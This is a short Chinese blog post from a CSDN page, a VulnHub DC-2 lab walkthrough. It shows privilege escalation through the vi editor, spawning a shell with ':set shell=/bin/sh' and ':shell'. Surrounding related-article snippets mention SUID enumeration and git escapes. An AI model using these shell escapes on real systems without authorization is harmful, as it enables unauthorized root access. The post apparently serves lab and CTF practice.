vi-提权

最新推荐文章于 2024-05-17 14:42:13 发布
最新推荐文章于 2024-05-17 14:42:13 发布
阅读量471 收藏 10
点赞数 7
分类专栏: 权限提升 文章标签: linux 权限提升
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longwanlian/article/details/135705109
版权

环境布置 ——vulnhub-dc2

compgen -c       //查看可以使用的指令

image-20240119155752801

发现可以使用vi命令,此命令存在提权(本质上属于sudo提权)

先查看提示

vi flag3.txt

image-20240119155933240

先提权然后查看jerry账号

操作步骤

vi随便打开文件
输入:
再下面添加
:set shell=/bin/sh
:shell

image-20240119164803845

按回车,再次输入:

image-20240119164829571

image-20240119164842649

图片转存中…(img-HUjOTdne-1705661798066)]

此时以及提升了权限,具体能提升多少,看操作环境

longersking
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ROG-CROSSHAIR-VI-HERO-ASUS-7803.rar
09-30
ROG-CROSSHAIR-VI-HERO-ASUS-7803.rar
JKI-VI-Tester:LabVIEW的JKI VI测试
05-08
您是否有VI Tester或LabVIEW单元测试您想讨论的问题,想法或挑战? 加入在的对话。 VI Tester是LabVIEW软件测试框架,可让软件开发人员测试其LabVIEW代码(VI)。 软件测试是敏捷开发和测试驱动的开发过程的关键组成部分,对于验证软件功能也至关重要。 VI Tester基于行业标准软件测试体系结构,该体系结构已在许多其他编程语言中使用。 这种架构非常灵活和强大,但对于初学者来说也很容易学习。 安装 您可以使用VI Package Manager下载并安装VI Tester。 用法 重要提示:VI Tester不是用于测试硬件的工具-为此,请使用 。 VI Tester框架由三部分组成: 单元测试,你写来测试您的应用软件-单元测试只是一个VI,你写测试另一个VI 用于运行测试的图形用户界面-也称为“图形测试运行器” 面向对象的测试框架-测试框架的核心架构
vim工具以及如何给用户加上sudo的权限
2201_75964502的博客
11-27 1206
vim以及如何给用户增加sudo的权限
HTB_Vaccine之通过root权限vi提权
网络安全学习
08-30 1099
zip解密 sqlmap获取os-shell root vi提权
linux suid 脚本,Linux使用suid vim.basic文件实现提权
weixin_39628343的博客
04-30 140
在kali上复现先给需要的vim.basic文件设置suid权限chmod u+s /usr/bin/vim.basic先adduser test1一个普通权限用户现在就是一个合适的提权环境通过以下命令可以找到存在suid权限的文件find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/d...
DC-2(VI GIT提权)
E1even的博客
08-25 752
文章目录扫描网段内存活主机及其开放端口FLAG1:访问即可FLAG2:使用工具爆破用户密码FLAG3:SSH登录并绕过rbash限制FLAG4:VI提权FLAG5:GIT提权 kali攻击????:192.168.78.131 目标主机:192.168.78.xxx 环境配置参照DC-1 扫描网段内存活主机及其开放端口 使用命令查询主机所在网段 ifconfig 得到网段192.168.78.xxx,扫描该网段内其他存活的主机 nmap -sP 192.168.78.0/24 发现192.168.
权限提升和维持
FisrtBqy的博客
03-30 1266
渗透测试中常见的权限提升和维持手段
Linux提权
热门推荐
m0_57856283的博客
03-12 1万+
将这个虚拟文件导入虚拟机 开机默认没密码 账号:Bob 密码:secret root账号密码secret123 进去之后是这样的 我们先查看他的ip地址 这里我们看到他是没有IP地址的 我们先切换到root账户 进来之后需要改一个配置文件 然后我们看到了它已经获取到了ip 然后我们打开kali远程到被害机,注意,我们用普通用户远程过去 ssh [email protected] 我们可以看到他已经远程了过来 过来之后我们可以先·看看他是什...
常用Linux提权(非漏洞)
Thegentlest的博客
08-31 4627
编译如下文件并添加SUID权限,在普通用户下执行该文件即可获得root的shell。}Note:上述SUID提权只是一部分并不全面,如需更多SUID提权详细信息可以参考如下链接GTFOBins。二、sudo命令提权当sudoers文件中某些用户包含某些命令的sudo权限时,可能导致提权问题发生。sudo -l查看当前用户有哪些sudo权限1.git执行!/bin/bash可以直接提权成功,less、man同理。...
DC-2靶机渗透测试(cewl,wpscan,hydra爆破,rbash逃逸,vi提权,git提权
single_g_l的博客
03-17 2634
目录 一. 环境 二. 信息收集(识别目标主机,端口,拿到flag1) 01. 主机发现 02.访问地址192.168.1.8:80 03. 注意到nmap扫描时有这样一个提示,基本可以确认需要手动配置hosts文件 04. 配置hosts文件,再次访问,拿到flag1 ​三. wpscan枚举,cwel生成字典,爆破获取密码,登录用户,拿到flag2 01. 使用cewl生成密码 02. 确定是wordpress,使用wpscan工具扫描,枚举出了用户 03. wpscan爆破拿到..
多态VI-综合文档
05-23
多态VI我和LabVIEW:一个NI工程师的编程经验
ROG-CROSSHAIR-VI-EXTREME-ASUS-7803.rar
09-30
ROG-CROSSHAIR-VI-EXTREME-ASUS-7803.rar
vi-use.rar_vi
09-23
vivisual editor 的缩写,是 UNIX 所提供的编辑器之一。它提供使用者一个视窗的编辑环境,在此视窗下,使用者可编辑所要的文件。vi、celvis(cvi) 是在工作站上被广大使用的中英文编辑软体。对初学者而言,常因...
LinuxLinux编辑器—vim使用
m0_52094687的博客
01-04 4220
该篇博客主要讲了为什么要学习vim,Linuxvim的基本概念,vim的基本操作,vim三种模式的切换,vim命令模式命令集,vim末行模式命令集,又讲了vim的简单配置,最后讲了使用vim在root用户下修改文件,给普通用户使用sudo提权的权力。又补充了一个小点,使用vim时使用ctrl+z退出后,该如何解决。写的不好,希望各位大佬多多指点。
LinuxLinux环境基础开发工具使用(二)vim【 Linux编辑器-vim使用与介绍 详细讲解 、vim各模式的命令合集 、sudo提权问题的讲解 以及如何提权
NiNi_suanfa的博客
11-27 349
vi/vim的区别简单点来说,它们都是多模式 编辑器,不同的是vim是vi的升级版本,它不仅兼容vi的所有指令,而且还有一些新的特性在里面。例如语法加亮,可视化操作不仅可以在终端运行,也可以运行于x window、 mac os、windows。我们课堂上,统一按照vim来进行讲解。三种模式正常模式插入模式底行模式我们一共有12种总模式,大家下来可以研究一下还有 视图模式 :可以进行代码的批量化注释vim操作打开关闭查看查询插入删除替换撤销复制等等操作。练习:当堂口头模式切换练习。
linuxvi权限第一位,3-Linux系统权限管理、vim|vi编辑文件的快捷方式
weixin_34255938的博客
05-05 142
内容概述1)操作系统用户管理知识· 操作系统用户分类说明· 用户相关重要文件目录· 用户管理相关命令总结2)操作系统数据权限知识· 权限作用功能介绍· 权限设置命令使用· 系统权限计算方式· 系统用户提权操作· 系统特殊权限功能3)vim|vi编辑文件的快捷方式操作系统用户管理知识Linux系统是一个多用户管理操作系统,并且多个用户可以同时管理操作系统操作系统用户分类说明超级管理员用户 ro...
linux笔记之 vi编辑器和用户的配置文件及提权
Key_book(句芒安全实验室)
05-03 1373
vi编辑器3种模式, 命令模式 dd 删除整行 yy 复制整行 p 粘贴 x 删除光标所处的字符 插入模式 a 在光标后插入 i 在光标前 o 换行输入 末行模式 : 切换到末行模式 :set nu 显示行号 :set nonu 不显示行号 用户信息存放位置 /etc/passwd 用户和群组密码存放位置 /etc/shadow 在centos6 中普通用...
linux利用* vim提权,linux 通过suid vim.basic文件提权
weixin_33289873的博客
05-14 188
在kali上复现先给需要的vim.basic文件设置suid权限chmod u+s /usr/bin/vim.basic先adduser test1一个普通权限用户现在就是一个合适的提权环境通过以下命令可以找到存在suid权限的文件find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/d...
Linux 三十六章
最新发布
一怀明月的博客
05-17 985
信号量 sem_init sem_destroy sem_wait sem_post 基于环形队列的CP问题 环形队列的生产者消费者模型 线程池 localtime时间戳转化 mkdir系统调用 bind绑定成员函数 懒汉饿汉单例模式 懒汉模式: 饿汉模式: 懒汉和饿汉相同点: 线程池源码实现
vi-orb-slam2
07-16
### 回答1: Vi-ORB-SLAM2是一种视觉惯性(VI)同时定位与地图构建(SLAM)系统,用于无人机和移动机器人的自主导航。它融合了惯性测量单元(IMU)和摄像头信息,通过实时跟踪相机的位置和姿态来构建地图和定位机器人。 Vi-ORB-SLAM2采用了ORB特征描述子和FAST角点特征,以实时地提取和匹配特征点。它利用相机的运动估计来排除误匹配的特征点,从而提高了对动态环境的鲁棒性。 Vi-ORB-SLAM2使用基于滤波器的方法来融合IMU和视觉数据。通过IMU的角速度和加速度数据,可以估计相机的运动和姿态,并根据视觉测量来校准IMU的漂移。这种融合可以提高系统的鲁棒性和精确性,特别是在存在相机运动模糊或视觉信息缺失的情况下。 Vi-ORB-SLAM2还具有回环检测和优化的能力,可以在长时间的导航中自动修正漂移误差。它采用词袋模型来建立地图和检测回环,通过优化相机和地图的位姿关系来实现全局一致性。 Vi-ORB-SLAM2已经在无人机和移动机器人的多个实验平台上进行了验证,并取得了令人满意的性能。它在实时性和精确性方面都有不错的表现,并且相对于传统的视觉SLAM系统更具鲁棒性。 综上所述,Vi-ORB-SLAM2是一种基于视觉惯性融合的SLAM系统,具有鲁棒性、精确性和实时性的优势,适用于无人机和移动机器人的自主导航。 ### 回答2: vi-orb-slam2是一种基于视觉的实时单目SLAM(Simultaneous Localization and Mapping)系统。SLAM是一种能够同时估计相机位姿和环境的三维地图的技术。vi-orb-slam2采用单个摄像头进行定位和地图构建。 vi-orb-slam2使用了一种双目VO(Visual Odometry)和ORB特征的融合方法。VO方法通过连续帧之间的图像匹配和运动估计来计算相机的运动轨迹。ORB特征是一种高效的特征提取算法,它可以在快速实时的情况下提取和匹配特征点。 vi-orb-slam2通过在VO方法中引入ORB特征,进一步提高了系统的鲁棒性和准确性。ORB特征具有自适应的尺度和旋转不变性,可以应对不同尺度和姿态变化的场景。此外,ORB特征的计算效率也很高,可以实现实时的图像处理和跟踪。 vi-orb-slam2在实际应用中具有广泛的应用前景。它可以用于室内导航、增强现实、机器人自主导航等领域。通过实时地建立环境地图和同时估计相机的位姿,vi-orb-slam2可以帮助机器人或者无人机在未知环境中进行自主导航和定位。同时,vi-orb-slam2的实时性和高效性也使得它可以应用于实时监控、虚拟现实等实时场景中。 总的来说,vi-orb-slam2是一种高效、鲁棒和实时的单目SLAM系统,具有广泛的应用前景,可以在多个领域中实现定位和地图构建的任务。 ### 回答3: vi-orb-slam2 是一种基于视觉和惯性传感器数据的实时单目SLAM(Simultaneous Localization and Mapping)系统。SLAM是一种同时利用感知和定位能力,实时构建环境地图并实现自我定位的技术。 vi-orb-slam2利用摄像头和惯性测量单元(IMU)融合数据,可以在没有GPS信号的情况下,实时地建立并更新环境地图,并估计自身相对于地图的位置和姿态信息。 其中,ORB指的是Oriented FAST and Rotated BRIEF,是一种特征检测和描述子提取算法,可以快速地检测和描述图像中的特征点。SLAM系统通过ORB算法提取图像关键点,并利用这些特征点进行特征匹配,从而实现环境地图的构建和定位过程。 vi-orb-slam2还利用IMU的数据,并将其与视觉数据进行融合,从而提高系统的稳定性和鲁棒性。IMU可以提供姿态和加速度信息,用于补偿视觉数据中的相机运动误差,进一步提高SLAM系统的定位精度和鲁棒性。 vi-orb-slam2具有实时性能,可以在实时视频流上运行,并实时地估计相机的位姿。这使得vi-orb-slam2在许多应用中具有广泛的应用前景,例如机器人导航、增强现实和虚拟现实等领域。 总之,vi-orb-slam2是一种基于视觉和惯性传感器的实时单目SLAM系统,通过视觉特征匹配和IMU数据融合,实现了环境地图的构建和自我定位。它具有实时性能和鲁棒性,适用于多种应用场景。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值